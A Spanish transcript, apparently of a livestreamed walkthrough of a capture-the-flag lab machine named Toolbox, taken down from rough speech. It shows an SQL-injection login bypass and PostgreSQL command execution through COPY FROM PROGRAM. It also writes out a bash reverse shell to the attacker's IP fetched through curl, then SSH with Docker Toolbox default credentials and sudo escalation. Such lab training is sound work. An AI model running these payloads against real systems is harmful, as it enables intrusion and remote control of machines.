vamos a poner aquí Anonymous. Damos un Enter. Y vale, podemos entrar. Si hacemos un ls-la. Bueno, estamos viendo lo mismo, ¿no? No estamos viendo algún otro archivo que nos lo estén dando, por ejemplo, como oculto ni nada por el estilo. Y nos pone Docker Toolbox. Bueno, yo ya viendo directamente por ahí cosillas, yo voy a poner aquí qué es Docker. ¿Cómo se me fue el nombre? Docker. Docker Toolbox. Vamos a dar un Enter. Y vale, tenemos cosas. Docker Toolbox proporciona una forma de utilizar Docker en sistemas Windows antiguos. Bueno, ya tenemos una nota aquí directamente. Sistemas Windows antiguos, ¿vale? Que no cumplen con los requisitos mínimos de sistemas para aplicación de Docker para Windows. El
componente principal de Docker requiere un sistema operativo Linux para poder ejecutar. Ok, ¿qué nos da a entender por aquí todo esto? Que posiblemente se estén desplegando contenedores, ¿vale? Que posiblemente se estén desplegando contenedores. Entonces, el componente principal de Docker requiere un sistema operativo Linux para poderse ejecutar. Entonces, quiero pensar que este binario que nosotros estamos viendo por aquí se está ejecutando para que de alguna manera pueda desplegar contenedores. En este caso, posiblemente nos estemos enfrentando ante una máquina con sistema operativo Linux y en paralelo a una máquina con sistema operativo Windows, que es lo que estamos enumerando. Ahora, como yo no estoy viendo nada, lo que puedo hacer es descargármelo una o dos, seguir inspeccionando. Tenemos el puerto 22, no contamos con credenciales válidas directamente para poder entrar. Tenemos el puerto 443. Yo me voy a salir de aquí, por ejemplo. Ahí está. Exit. Exit. Control C. Control C. Exit. Exit. Invalid command. Kit. Ahí está. Vale, pues como yo tengo el puerto 443 abierto, voy a inspeccionar el certificado, porque recuerden que inspeccionando el certificado, que de hecho por aquí ya me aplicó un script, y vean que me pone Megalogistic, Apache, Apache 2.4 Debian, es lo que les digo, posiblemente vayamos a ganar directamente acceso a una máquina Linux, a un contenedor, y no a una máquina Windows. Y chéquense esto, vean esto, todo esto que está aquí, que está por aquí. Vamos a subrayar, ¿vale? Por ejemplo, yo estoy viendo aquí directamente un nombre de dominio. Uno, que este es el mismo, y megalogistic.com. Bueno, tenemos cosillas. Tenemos cosillas, por ejemplo, si yo le mando un paquete, si hago un ping menos C1 a admin.megalogistic.com, vamos a ver si me responde esto. Y bueno, me responde, esto ya no está en nuestro alcance, pero esto, bueno, esto es una cagada directamente de la máquina, porque yo no sé por qué dice .com. Tendría que decir .htb. También, por ejemplo, si lanzamos un paquete directamente, ping menos C1 a megalogistic.com, vamos a tener respuesta. Y tenemos un TTL128. Estamos ante una máquina con sistema operativo Windows. Pero esta es una gran cagada porque realmente no tendría que decir .com. Tendría que decir, en teoría, .htb. Pero bueno, nosotros como queremos que apunte a la IP de la máquina víctima y no a este nombre de... a esta dirección IP, lo que vamos a hacer es que lo vamos a agregar directamente al etc password. Por ejemplo, yo voy a hacer aquí un nano. Y por ejemplo, voy a poner password, yo. Ahí está, y bueno, aquí lo vamos a estar agregando, ¿vale? La dirección IP es la 10.10.236 y sería megalogistic.com, y el otro sería admin.megalogistic.com, ¿vale? De esta manera, cuando directamente apuntemos nosotros al nombre de dominio y al subdominio, apuntaría directamente a la dirección IP de la máquina víctima, que en este caso sería la Tollbox, ¿vale? Vamos a guardar esto, nos salimos, y ahora sí, si le mandamos un paquete a admin.megalogistic.com, vean cómo ahora sí apunta a la 10.10.236, que es la máquina que estamos tratando de testear. Si también lo hacemos directamente a Megalogistic, también pasaría lo mismo, ¿vale? Entonces, ya tenemos un nombre de dominio y un nombre de subdominio. Ahora, bueno, vamos a seguir inspeccionando. Que recuerden que si de plano el script no es aplicable o no, ustedes no lo aplican y lo quieren aplicar directamente, con OpenSSL, SSL, del lado del cliente, vamos a ponerle aquí client. Client.
client apuntando directamente a la 10.10.236 por el puerto 443, perdón, 443. Vamos a inspeccionar el certificado y vean cómo aquí ya les da un poquito más de tralla de información. Que no vamos a ver mucho porque, bueno, el script de Nmap es muy, muy completo y la verdad les da muchas cosas ahí. Pero bueno, si ustedes lo quieren inspeccionar manualmente, bueno, pues ustedes también ya lo van a ver directamente aquí. Y bueno, tenemos el nombre de subdominio, tenemos el nombre de dominio y tenemos un nombre posiblemente de usuario. Ahora, si bajamos un poquito, bueno, seguimos viendo lo mismo. Vemos ahí más cosillas, certificado, vemos más cosillas. Y hasta ahí como que termina mi fase de reconocimiento. Bueno, esto lo vamos a cerrar. Y bueno, ya habíamos visto que por el puerto 445 Nanay y el puerto 5985, bueno, pues necesitamos credenciales válidas para poder entrar por este apartado. Y de resto, bueno, los puertos siempre son los mismos que los que nos están apareciendo. Bueno, como yo estoy viendo que tiene una página web, bueno, pues vamos a ver si realmente nos hace el redireccionamiento. Porque la otra es que nosotros, recuerden que con WattWeb apuntamos a https://, y le ponemos la 10.10.10.236, vamos a ver si nos detecta las tecnologías que están corriendo por detrás. Que esto normalmente siempre lo hacemos. Y vean, nos pone Apache 2.4.38, Bootstrap, HTTP Server, Debian, Linux, que ya yo estoy casi seguro de que vamos a ganar acceso a un contenedor. Y vean, nos pone Debian y nos pone la 10.10.236, jQuery 3.3.1, que esto no sé si esté desactualizado. Y nos pone Megalogistic, que es el título de la página web. Vamos a irnos de este lado de por acá. Vamos a poner la 10.10.10.236. Vamos a ver si nos hace un redireccionamiento. Y sí, nos hace un redireccionamiento a HTTPS. Vamos a ponerle avanzar porque es un certificado autofirmado. Que lo detecta como no seguro. Y bueno, tenemos cosas, ¿vale? Tenemos cosas. Bueno, desde aquí ya estamos jugando directamente con contenedores. Estos son contenedores. Y bueno, pues vamos a ver qué podemos encontrar por aquí. Nos pone Megalogistic, Worldwide Free GHT Service y un chorro de cosas más, ¿no? Lo que podemos encontrar directamente en una página. Ahora, antes de empezar a buscar por aquí, vamos a ver si realmente Megalogistic HTTPS://, y sería megalogistic.com, nos redirecciona a otro lado, nos pone que es un certificado autofirmado. Vamos a darle un enter por acá y vale, es lo mismo. Vamos a copiarnos todo esto de aquí, vamos a ponerle aquí un copy, vámonos para acá y vamos a ponerle aquí admin, ¿no? Que habíamos visto que tenía un nombre de dominio, admin.megalogistic.com. Y ojito, se les hace conocido. Vale, amigos, pues tenemos un panel de autenticación. Vamos a ver qué nos reporta por aquí el Wapalizer. Nos pone HTTP2, Apache HTTP Server y bueno, Language PHP. Esto siempre a mí me gusta mucho porque cuando nos interpreta PHP, híjole, es lo mejor que podemos encontrar cuando estemos haciendo una auditoría. Bueno, y entre otras cosillas, ¿no? Bueno, y tenemos Megalogistic. Vamos a echarle un ojito rápido a esto. Vamos a ver qué nos reporta por aquí el Wapalizer. Y nos pone aquí Debian. Que de hecho, aquí vamos a ver si nos pone por aquí también Debian. Apache, Debian. Bueno, pues esto es lo mismo prácticamente. Que quiero pensar que este es el contenedor. Vamos a echar un ojito rápido. Bueno, tenemos una parte de About. Que no nos redirecciona a ningún lado. Service. Si hacemos hovering y vemos en la parte inferior, izquierda, podemos ver que no nos redirecciona a ningún lado. No, about or history, bueno, su historia, que no me interesa. Vamos a darle un poquito más para abajo. Tenemos aquí algunos nombres de posiblemente usuarios. Tenemos un Christine, Robert, Bruce, John y Christine.
Recuerden que cuando estamos directamente en un domain controller, bueno, que este no es un domain controller, recuerden que los nombres no son como estos, ¿eh? Recuerden que los nombres directamente, por ejemplo, aquí dice Bruce Roger, sería B Roger o B. Roger o Bruce.Roger, o bueno, puede ser varios tipos de nombres, pero esa siempre es la sintaxis directamente de un directorio activo. Pero nanay, ¿no? No estamos viendo como que mucho por aquí. Vamos a darle aquí en contact. Vamos a bajar un poquito. Y bueno, tenemos para poder poner cosillas. Por ejemplo, yo voy a poner aquí Raptor. Raptor. Email Raptor. Raptor. Arroba megalogistic.com. Cualquier cosa. Y test. Vamos a ver si podemos llegar a ver algo por ahí. Bueno, aquí nos pone... bueno, aquí no nos pone mucho. Vamos a darle en send. Pero... nanay, ¿no? Al parecer esto no está funcional. No, al parecer esto no está funcional. Bueno, no tenemos nada. Esto es una página directamente que nada más nos está diciendo que nos hagamos ahí patos. Vamos a darle un poquito más para abajo. Y de resto no tenemos nada tampoco por aquí. Corloslip.com, bueno, pues esto ya es otra cosa. Pero recuerden que también hay que inspeccionar directamente el código fuente, porque en ocasiones llegamos a ver notas. Notas de cualquier gilipollas que haya dejado por ahí alguna cosa escrita. Bueno, pues al parecer esta página nada más nos quiere tentar ahí el corazón un poquito. Y bueno, vámonos de este lado. ¿Qué podemos hacer aquí en este caso? Bueno, pues podemos empezar a testear, ¿no? Directamente. Recuerden en este aspecto que primero necesitamos hacer una enumeración con usuarios genéricos, ¿vale? Usuarios genéricos. Admin, root, guest, administrator, bueno, cualquier nombre que ustedes crean que puede aparecer aquí, ¿vale? ¿Qué tal, Miguelón? ¿Cómo estás? ¿Ya tiene ratito? ¿Cómo va ese EJPT? ¿O ya te lo sacaste? No me digas que ya te lo sacaste, ¿eh? Vale, pues primero que nada, admin, ¿no? Admin. Vamos a darle un enter. Nada. Vamos a ponerle guest. Nada. Vamos a ponerle aquí root. Nada. Vamos a ponerle administrator. Le pongo administrator porque estamos tratando con una máquina Windows. Y recuerden que aquí sí existe el usuario administrator. Pero pues prácticamente no vemos cosillas, ¿vale? Ok. Después, si no vemos cosas, ¿qué hacemos? Recuerden que si no vemos alguna cosilla directamente, probamos... y pequeñas inyecciones SQL que nos permitan bypassear esto. Como por ejemplo, yo voy a poner admin, comilla, or 1 es igual a 1 y coméntame todo lo demás, ¿vale? No quiero que me lo digas, no quiero que me lo hagas válido, pues. Vamos a ponerle el login. Por la cara, cabrón. ¿Se imaginan? ¿Se imaginan que así fuera Facebook? No, apenas estoy trabajando. Ya para pegarlo me puse a chambear. Pero comprarlo. Ah, vale. Pues muy bien, te deseo todo lo mejor, amigo. Y también estamos en eso, ¿eh? No te preocupes. Todos estamos ahorrando para nuestros certificados. Esperaba que usara MetaExploit. No. Y por utilizar la palabra directamente MetaExploit, a ver, te vas expulsado por unos 5 minutos, ¿vale? Vale, para que te des una vuelta ahí a la cancha y pienses muy bien lo que estás diciendo. Vale, proseguimos. ¿Vale? Vale, pues vamos a seguir. Vean cómo realmente no, digamos,
No nos pidió ni siquiera contraseña, cabrón. Pero bueno, vamos a ver si esto de aquí no podemos llegar a encontrar algo, porque pues prácticamente acabamos de entrar sin proporcionar contraseña mediante una pequeña query. Recuerden que esto llegase a pasar, aunque ustedes no lo crean, hay muchas empresas que todavía siguen utilizando Windows XP, Windows 7, y no actualizan porque sus herramientas, prácticamente las que tienen, dejan de funcionar si los actualizan a Windows 10. Recuérdenlo muy, muy, muy bien, ¿vale? Entonces, esto llegase a pasar. Bueno, veamos esto, ¿no? El servidor es actual. ¡Qué lache! Permítame. Vale. Ahora sí ya. El servidor está actualmente estable. El servidor funciona con normalidad y no se ha detectado problema recientemente. Si nota una interrupción, informe al administrador. Ok, quiero pensar que yo soy administrador. O más bien, esto lo escribió el administrador, ¿no? Enviar credenciales a Tony. Ojo, tenemos un usuario, Tony. ¿Vale? Ya tenemos posiblemente dos usuarios, admin y Tony. ¿Vale? Actualizar controladores de impresora. Bueno, posiblemente no han actualizado nada por ahí. Vamos a ver un poquito por acá. Tenemos más cosas. Tenemos nombres de subdominio y más cosillas, ¿no? Por ejemplo, si le damos aquí, podemos editar directamente nombre de usuario, pero al parecer esta tiene una estructura como tipo base de datos. Esto es un tipo de estructura de base de datos, ¿vale? Megacorp, que de hecho creo que esto lo habíamos visto directamente cuando hacíamos un bat a ports. A ver, déjenme ver por aquí. Lo había visto por aquí. Megacorp, no, creo que no era aquí, creo que lo habíamos hecho con CrackMapExe. A ver, vamos a ver. Domain Toolbox Ignoble, bueno, esto no lo había visto yo. Bueno, tenemos aquí desarrollador Megacorp, ¿no? Tablero versión la 1.0.0. Pero de resto, no estoy viendo nada. No hay nada, cabrón. Bueno, al parecer, ojito, los tiros posiblemente sean por aquí. Pero estoy viendo que es vulnerable a inyecciones SQL. ¿No? Try again. Reset. Vale. Es vulnerable a inyecciones SQL. Si nosotros ponemos una comilla, por ejemplo, admin, comilla, o más bien la pura comilla sola, que estamos cerrando directamente, vamos a ponerle login y vale. Vean, chequense esto, nos pone warning, PG query, query filed error syntaxis error and or near. Y bueno, nos pone from user where username and password MD5. Y bueno, aquí tendría que ir directamente el password, ¿no? Y nos está dando una ruta directamente de donde se está haciendo esto, ¿no? En bar WWAM. Chequen, esto no es una ruta de Windows, ¿eh? Esto es una ruta de Linux. Entonces ya voy más claro, más directo, de que no vamos a ganar directamente acceso como el usuario. No vamos a ganar directamente acceso a una máquina Windows. Vamos a ganar acceso directamente a un contenedor. Entonces, ¿qué podemos hacer aquí en este aspecto? Bueno, yo estoy viendo que está corriendo Postgres por detrás. Vale, PG Query. Bueno, para quien no lo sepa, y que yo tampoco lo sabía hasta en su momento lo supe, cuando se está implementando Postgres por detrás, hay una manera de poder ganar acceso a la máquina directamente mediante la creación de tablas, ¿vale? Vamos a verlo cómo podemos realmente ganar acceso mediante un testeo, ¿ok? Esto lo vamos a hacer directamente con Burp Suite. Vamos a testear todo esto con Burp Suite. Lo podemos hacer con Curl directamente. Podemos pasarle, ya saben, las cabeceras y podemos ahí tratar de scripteándolo un poquillo, pero es un poquito medio lioso. ¿Vale?
Entonces, lo que vamos a hacer, esto lo vamos a hacer con Burst Suite. Vamos a hacerlo con Burst Suite, ¿vale? Vamos a hacerlo con Burst Suite. Vámonos para acá de este lado. Este lo voy a cerrar, ya lo voy a cerrar aquí. Vamos a abrirnos directamente Burst Suite, que aquí lo tengo. Vamos a darle un Enter. Vamos a darle aquí en OK. Vamos a darle en Next, Close, Start Burst Suite. Vale, aquí estamos, ¿vale? Nos vamos aquí en Proxy y nos vamos a Intercept. Bueno, nos vamos acá directamente a nuestra paginita donde vamos a activar directamente nuestro Burp Suite. Recuerden que para configurar el Foxy Proxy realmente es un add-on. Le vamos a decir que vamos a crear un proxy de tipo HTTP donde escuche en el equipo local, que vendría siendo... ¿Por qué no lo tengo configurado, cabrón? Ah, no, sí lo tengo configurado, nada más que le puse add, ¿no? Bueno, era en este. Ahí está, ¿no? Es un proxy de tipo HTTP que escucha por el equipo local por el puerto 8080. Que también recuerden que en Burp Suite lo tenemos de esta manera, ¿vale? Si nos vamos a... ¡Ay, carambas! No es aquí, esto lo cerramos. Si nos vamos, creo que es aquí en opciones. Ok. Cerramos esto en opciones. También escucha por el equipo local por el puerto 8080, ¿vale? Entonces, vámonos por acá al proxy. Nos vamos aquí a intercept. Vamos a interceptar esto. Y bueno, aquí cómo le vamos a hacer. Vamos a cerrar esto de aquí. Ahí está. Ahí está prendido ya el Foxy Proxy. Y vamos a mandar directamente una petición, ¿no? Admin y admin. Vamos a interceptarla. ¿Qué pasó ahí? Forward, forward, forward. Ahí está. Aceptar el riesgo y continuar. Bueno, la interceptamos, cabrón. Vale, pues tenemos aquí la estructura directamente de lo que está pasando por detrás. Recuerden que Burst Suite actúa como intermediario para interceptar la data y después manejarla directamente con el servidor mediante la respuesta. En este caso vamos a mandar esto al repeater, vamos a mandarlo para acá para el repeater. Y bueno, pues aquí tenemos, ¿no? Si nosotros por ejemplo le damos un send, aquí vamos a ver la respuesta directamente de lo que está pasando por detrás, ¿no? Y en teoría no debió de haber funcionado porque admin no es la contraseña como tal directamente del panel de logueo. Perdón, pero bueno, lo que vamos a hacer nosotros es que vamos a manipular este campo que está por aquí. Por ejemplo, yo aquí le puse una comilla directamente y aquí le puse también una comilla. Vamos a darle por acá una comilla. Vamos a borrar esto de admin y vamos a darle en send, ¿vale? Y bueno, ahí estamos viendo directamente el error, ¿no? Nos pone syntaxis error, add or near, y bueno, quote. Y bueno, ahí nos pone más cosillas directamente, ¿no? Que pues nosotros estamos cerrando esta parte. Ahora, ¿qué vamos a hacer aquí? Como yo sé que Postgre está por detrás, digamos, recuerden que nos podemos ir a nuestra Biblia, que recuerden que Hacktrix es la Biblia, donde nos va a enseñar métodos para poder enumerar sitios y donde se está contemplando este tipo de tecnologías. Por ejemplo, yo le voy a poner aquí Hacktrix. Vamos para Hacktrix. Nos metemos a Hacktrix. Ahí está. Vámonos por acá. Vamos para acá de este lado. Vamos a ponerle aquí. Que vean, chéquense que aquí en Arch, Hacktrix no va para nada lento, ¿eh? En Parrot, cuando me metía directamente, sí se me alentaba muchísimo, ¿eh? Muchísimo, muchísimo. No sé, las magias de Arch. Pero bueno, si nosotros ponemos por aquí Postgres SQL Injection, vámonos por acá, de este lado.
Bueno, pues hay una manera de validar directamente si sí o sí la web es vulnerable, ¿vale? Si nosotros que ya lo estamos viendo, nosotros ya hicimos nuestro testeo, pero podemos llegar a hacerlo también de otro tipo de testeo. Por ejemplo, aquí está metiéndole el ID igual a 1, que en este caso, bueno, aquí sería el usuario, y le está metiendo esto de punto y coma select pg sleep 10, que es como nosotros cuando queremos ver si nos tarda en responder de 5 a 10 segundos, le metemos un OR sleep 5 segundos, comentamos todo lo demás y vemos si tarda en respondernos la web 5 segundos. En este caso vendría siendo lo mismo. Vamos a copiar todo esto desde aquí, desde el punto y coma. Y vamos a pasarlo a aquí, a donde está el boot suite, ¿vale? Vamos a darle aquí en send. Si de plano no nos funciona, si de plano no nos funciona, lo que vamos a hacer es que todo esto lo vamos a URL encodear, o vamos a sustituir los espacios por más, ¿vale? Vamos a darle aquí en send. Y ojito. 1, 2, 3, 4, 5, 6, 7, 8, 9, bueno, y 10. Y vale, es vulnerable, ¿ok? Entonces, como sé que es vulnerable directamente a inyecciones SQ. ¿Dónde estaba? Era por aquí lo había visto. Postgres, era este, Pentesting Postgres SQL. Ya me había perdido yo, pensé que no era aquí. Bueno, tenemos una manera directamente de realizar una ejecución remota de comandos mediante la creación de una tabla. Por ejemplo, yo me voy a ir al apartado de por aquí estaba, por aquí está, por aquí estaba. A ver, vamos a irnos para acá. Aquí está, ¿vale? Vamos a cambiar esto a español. Bueno, donde la versión 9.3 son los superusuarios miembros del grupo PG Execute Server Program pueden usar copia para RC ejemplo como exfiltración. Bueno, aquí nos está dando directamente una query, pero la que vamos a ocupar nosotros directamente es esta, ¿ok? Lo que vamos a hacer nosotros, bueno, aquí está borrando drop tail if exit cmd exec, por si ya existe directamente una tabla con nombre cmd-exec. Lo que vamos a hacer nosotros es crear una tabla para posteriormente nosotros poder ejecutar un comando. ¿Y cómo vamos a hacer esto? Bueno, pues sencillamente lo único que tenemos que hacer es copiarnos todo esto hasta aquí. Nos venimos para acá. Y aquí donde vimos que ya es vulnerable, bueno, nos vamos a borrar todo esto. Creo que es hasta aquí. Sí, a ver, vamos a darle aquí en send. Sintaxis error. Bueno, aquí tendría que ser comilla, comilla, guión, guión, espacio, guión, send. Y vale. No nos está dando ningún error, ¿vale? Eso quiere decir, o a mí me da a entender, que se ha creado directamente la tabla, ¿vale? Si nosotros volvemos a darle send, vean cómo ahora sí nos va a dar un error, porque nos pone error relational quit cmd execute already exists int. Y bueno, ahí nos está diciendo que ya existe directamente la tabla cmd input, cmd, perdón, guión exec, ¿vale? Ahora, ¿cómo vamos a hacerle aquí directamente para nosotros poder ejecutar comandos? Por lo que yo tengo entendido, si nosotros ahora nos venimos de este lado por acá, a Hacktricks, y le pasamos copy cmd exec from program id, podríamos ejecutar el comando id, pero el output directamente no lo vamos a ver reflejado. Por ejemplo, vamos a borrar todo esto. Vamos a pasarle todo esto, guión, guión, espacio, guión. Vamos a darle en send. Y bueno, si nosotros por aquí buscamos el comando id, pues prácticamente no nos lo va a dar, ¿vale? No vamos a obtener directamente ningún comando. Pero no es el único comando que existe. Nosotros podemos tratar de mandarnos un paquete directamente a nuestra máquina para ver si tenemos la capacidad de ejecución remota de comandos. Entonces, aquí en este aspecto, por ejemplo, yo con sudo tcpdump
Me voy a poner en escucha mediante mi interfaz Tune 0, atrasas y CMP, donde aquí le voy a poner un verbose y no aplicar resolución DNS. Ahí está. Vamos a ver si tenemos capacidad de ejecución remota de comandos. Por ejemplo, aquí yo le voy a poner ping -c1 a la 10.10.10. No, perdón. ¿Cuál es mi IP? If config. Mi IP es la 16.5. Bueno, vamos a darle aquí a la 16.5 y vamos a ver si recibimos la traza. Vamos a darle aquí en, bueno, ping. Vamos a darle en send. Bueno, aquí nos pone error program. Bueno, nos pone que no se ha ejecutado. Posiblemente ping no esté contemplado. Vamos a hacerlo con curl. Vamos a ver si curl sí lo tiene contemplado. Posiblemente ping no lo tenga contemplado. Vamos a salirnos de aquí. Control C, ahí está. Control L. Vamos a montarnos un servidor con Python para ver si recibimos la petición http.server por el puerto 80. Ahí está. Y bueno, vamos a ver si recibimos la petición send. Y ojito, get. Vale, pues bueno, lo que nos importa aquí de alguna manera es que tenemos la capacidad de ejecución de comandos, ¿no? Pero la cuestión aquí es que, por ejemplo, si yo me mandé un paquete y no se aconteció y yo estoy mandándome una petición GET, posiblemente ping no lo tenga contemplado, posiblemente, o posiblemente no lo esté ejecutando como tal. Entonces, ¿qué hacemos cuando tenemos capacidad de utilizar curl? Bueno, normalmente hay varias maneras de ganar acceso a la máquina. Recuerden que hay muchas maneras de ganar acceso a la máquina, pero una en especial, podríamos decirlo que de esta manera en especial, es donde nos creamos un archivito index.html y en base al index nosotros le clavamos directamente un pequeño código en bash. Que este código en bash va a ser una que nos mande una shell totalmente interactiva a nuestro equipo de atacante. Entonces, por ejemplo, yo aquí me voy a ir directamente a Counten. Y aquí en Counten lo que voy a hacer es que me voy a crear con Nano, o más bien con nvim, me voy a crear un archivo que se llame index.html, ¿vale? Ahí está. Vamos a meternos y bueno, esto va a ser un script de bash. Esto no va a ser un archivito en HTML. Esto va a ser un script de bash. Vamos a ponerle aquí vim bash. Ahí está. Y bueno, ¿qué es lo que queremos que hacer cuando lea este archivito? Bueno, le vamos a decir bash-i ampersand dep tcp. Mándame una shell a la 10.10.16.5 por el puerto 4444 y cerramos esto directamente, ¿vale? De esta manera nos va a mandar una shell a nuestra máquina de atacantes, ¿vale? Entonces vamos a cerrar esto, ahí está, y ahora sí, nos vamos a montar nuestro servidor en Python y ojito, nosotros desde aquí vamos a tramitar una petición GET a nuestro servidor montado, pero cuando me lea el index.html quiero que me lo interprete con bash. Esto lo que va a hacer es interpretarme el código que yo le ingresé al index.html y mandarme una shell totalmente interactiva, bueno, semi interactiva, a mi máquina de atacante, por lo cual yo aquí me voy a poner en escucha con netcat por el puerto 4444 en espera de la shell que nos vamos a mandar. Bueno, pues ya está todo listo. Vamos a darle aquí en send. Ahí está. Recibimos la petición, me lo interpreta con bash y ojito, who am I? Postgres. Bueno, pues somos Postgres.
hemos ganado acceso a la máquina. Y de esta manera estaríamos de alguna manera aconteciendo el RCE mediante la creación de una tabla para la posterior ejecución de comandos remotos. Bueno, pues eso nunca lo habíamos tocado directamente, no habíamos tocado directamente vulnerar Postgres, que esto es algo que es nuevo, directamente nunca lo habíamos tocado. Pero bueno, pues está chulo, la verdad es que son cosas nuevas que aprendemos. Y bueno, pues ahora sí, ¿qué toca? Hacer un tratamiento de latte. Script dep null menos c bash. Ahí está, control z, stti, raw, menos echo, punto y coma, fg, ¿vale? Reset con una xter. Y ahí está. Si hacemos control z, pues prácticamente ahora sí nos saca. Pero no podemos hacer control l. Vamos a hacer un export de la term que valga xter y export de la shell que valga bash. Y ahora sí, podemos hacer control L y podemos hacer cualquier cosa, historial, cualquier cosa. Y bueno, ya tenemos una shell totalmente interactiva. Ahora, si yo me voy directamente a Home, vamos a ver qué usuarios hay. Tony, tenemos al usuario Tony. Pero primero que nada, vamos a ver si realmente ganamos acceso a un contenedor. If config. If config. Y vean, chéquense esto. Prácticamente no estamos ganando acceso a la máquina directamente. Estamos ganando acceso a un contenedor, que es lo que ya hemos visto anteriormente. Por eso la herramienta de Docker Tool, ¿vale? Entonces ya sabemos que se está implementando Docker Tool por detrás y estamos ganando acceso a un contenedor. Ahora, esta no es la IP directamente que se está comunicando con la máquina víctima. Si nosotros hacemos un un route. Vamos a darle un tiempecito ahí. Esta podríamos decirse que vendría siendo la dirección IP real de la que pues estábamos nosotros, bueno, es la que se comunica directamente con la máquina, que es la real, que quiero pensar que no hay otro contenedor dentro de un contenedor, si no estaríamos ganando acceso a otro contenedor. Entonces, vamos a ver si realmente estamos ganando acceso a otro contenedor. ¿Cómo vamos a hacer esto? Primero que nada, yo estoy viendo que por aquí tenemos al usuario Tony, ¿no? Vamos a meternos aquí a Tony, un ls-la. No está la flag aquí. Vamos a hacer un id. Estamos en el grupo SSL cert. Un sudo menos. Esto se fue la pinga. Al parecer, creo que por detrás hay una tarea que se está ejecutando directamente que posiblemente esté borrando cualquier archivo o más bien que esté reseteando cualquier cosa que se esté haciendo en la base de datos. Vamos a darle por aquí un exit. Cerramos. Volvemos a abrir. Con Netcat vamos a ponernos en escucha otra vez. Vamos a mandarnos otra petición. Acceso, otra vez script dep null menos c bash, control z, stti, raw menos echo fg, reset con una xterm, ahí está, export de la term que valga xterm y export de la shell que valga bash, ahí está. Vamos a irnos directamente a la raíz. Y tenemos los directorios de siempre. Habíamos hecho un sudo menos l, eso no lo habíamos hecho, ¿no? Sudo comma not found. Tenemos ping. Bueno, vean, chequen. Ping no tenemos. Pero cool si teníamos. Si hacemos un cat a etc password. Postgres, solamente Postgres es válido. Y root. Pero no tenemos a ningún Tony. Posiblemente ni Tony exista. Bueno, vale. Ya sabemos que estamos directamente ante un Docker Tool, ¿no? Que así se llama la aplicación. Vamos acá directamente acá. Y por ejemplo, vamos a ponerle aquí Docker.
Docker, Tool, Password, Password Default. Vamos a buscar Password por Default de Docker Tool. ¿Por qué? Porque si ustedes no recuerdan, vámonos para la... Esto, a ver, vamos a abrirnos otra. Esto lo vamos a mandar directamente a la cuarta. Si ustedes no recuerdan, si nos vamos, por ejemplo, a Documents, a Prácticas, HTTP y Nmap, si hacemos un bat a ports, si no recuerdan, está abierto el puerto 22. Y si hay credenciales por default de esta aplicación, podemos llegar a colar directamente desde ahí. Entonces, aquí hay que probar de todo. Vamos a ver si por aquí nos pone algo. Docker Toolbox. Me faltó aquí Toolbox. Vamos a ver si por aquí nos pone algo. Y chéquense esto. Enter Docker as user y tcuser as password. ¿Vale? Docker Machine Virtual Box. SSH. Bueno, pues podemos probar esto. TC user y Docker. Primero que nada, vamos a ver si está abierto el puerto 22 desde aquí. Posiblemente, ¿qué tal si estemos ganando acceso a otro contenedor? Por ejemplo, si hacemos un echo y mandamos una cadena vacía al TCP, ponemos la IP, la 10.10.10.236. No es esta. If config es esta. Echo, mandamos una cadena vacía para ver si el puerto está activo de TCP a esto, pero era la 1 y sería al puerto 22. Si podríamos decir si la primera se cumple, en este caso aquí sería echo. Vamos a ponerle port open, ¿vale? Vamos a darle un enter y vale, nos pone port open. Si nosotros apuntamos, por ejemplo, al puerto 2025, nos pone bash connected, connected, refused, ¿vale? Entonces el puerto 22 sí está abierto. ¿Vale? Entonces tenemos abierto el puerto 22. Vamos a ver si nos podemos loguear por SSH. Vamos a ponerle docker. Docker arroba sería docker arroba la carambas. Vamos a salirnos otra vez porque otra vez se fue al carajo esto. Ahí está. Vamos a poner otra vez en escucha. Mandamos la shell. Ganamos acceso. Otra vez script dep. Dep null -c bash. Ahí está. Control Z, STTI. STTI. STTI, RAW, FG, reset, xter. Todo por escribir rápido, xter. Ahí está. Export de la ter que valga xter. Y export de la shell que valga bash. Ahí está, ¿vale? Ahora sí, SSH sería docker arroba, ponemos la IP. Uff, es la... se me va la IP, ¿eh? If config. Ahí está, SSH docker, como el usuario docker. Vamos a ponerle la IP, la 172.17.0.1. Vamos a dar un enter y era TC user, ¿no? Y ojito. Entonces sí, sí estamos ante la, ante el binario este que dice Docker Toolbox, ¿no? Realmente sí es este. Entonces ahora sí, hemos ganado directamente. Pero si hacemos un if config, if config, if con
comfy. Bueno, tenemos un chorro más de cosillas. Por ejemplo, ahora sí, podríamos decirse que esta es la dirección, ahora sí, donde nos podemos comunicar directamente a la IP de la máquina víctima. Por ejemplo, yo estoy viendo por aquí la 10.0.2.15, 192, bueno, otras, son otras interfaces y de resto nanay, ¿vale? Pero todavía no ganamos acceso a la máquina víctima, a la real, a la que tenemos que ganar acceso, que vendría siendo la Tollbox. Entonces, pues vamos a enumerar un poquito aquí, vamos a hacer un ls-la. Tenemos directamente un directorio SSH. A ver, vamos a echarle un ojito. ls-la.ssh. Bueno, tenemos dos authorized keys. Vamos a hacer un ID. Estamos en el grupo Docker, que ya saben que, bueno, podemos escalar privilegios directamente si estamos en el grupo Docker. Vamos a hacer un sudo menos L. Sudo menos L. Y vale, Docker puede ejecutar como root sin proporcionar password cualquier comando. Bueno, si puedo ejecutar cualquier comando, sudo su y ya somos root. Pero lo que me queda, no me queda claro es dónde está la flag. En teoría tendría que estar aquí. Por ejemplo, si hacemos un find y buscamos desde la raíz, por ejemplo, la flag con nombre user.txt y mandamos todo al def null. Find, no fin, fif. Vamos a darle un tiempecito. Y tenemos dos. Tenemos dos flags. Vamos a darle un cat a la primera. Ahí está, esa es la primera. De hecho, no he puesto directamente las proporciones de mi pantalla. Y veamos. Es la misma. Vale, pues entonces yo creo que esta sería la flag como el usuario no privilegiado y esta sería la primera parte de la máquina. Ahora, si nos vamos a la raíz para ver qué directorios tenemos por aquí. Y ojito. Tenemos un directorio C. Esto es raro. Esto no viene. Esto no viene. A ver, vamos a C. ls-la. Tenemos un apartado de users. Se nos fue otra vez al carajo. Pero podemos ganar acceso directamente por fuera, ¿verdad? Podemos ganar acceso por fuera, porque tenemos las credenciales. Tanto, bueno, tenemos las credenciales del usuario ese del usuario Docker. Vamos a salirnos de aquí. Vamos a darle aquí en control C. Ahí está. Por ejemplo, por SSH, vamos a conectarnos a Docker. No, no vamos a poder hacerlo. A ver, Docker arroba. No, no vamos a poder hacerlo desde aquí. No vamos a poder hacerlo desde aquí. Vamos a tener que hacerlo otra vez directamente desde acá, desde Boot Suite. Vamos a darle en send. Ahí está. Script. Dev null. Menos C. Bash. Control Z. STTI. RAW. Punto y 